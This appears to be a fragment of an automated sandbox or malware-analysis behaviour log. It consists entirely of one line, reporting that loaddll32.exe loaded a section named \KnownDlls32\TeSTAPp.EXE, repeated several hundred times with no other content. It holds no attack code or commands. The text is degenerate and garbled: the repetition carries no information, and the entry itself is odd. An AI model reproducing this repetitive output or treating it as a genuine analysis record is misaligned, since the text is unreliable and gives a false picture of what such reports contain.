Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\TeSTAPp.EXEJump to behavior
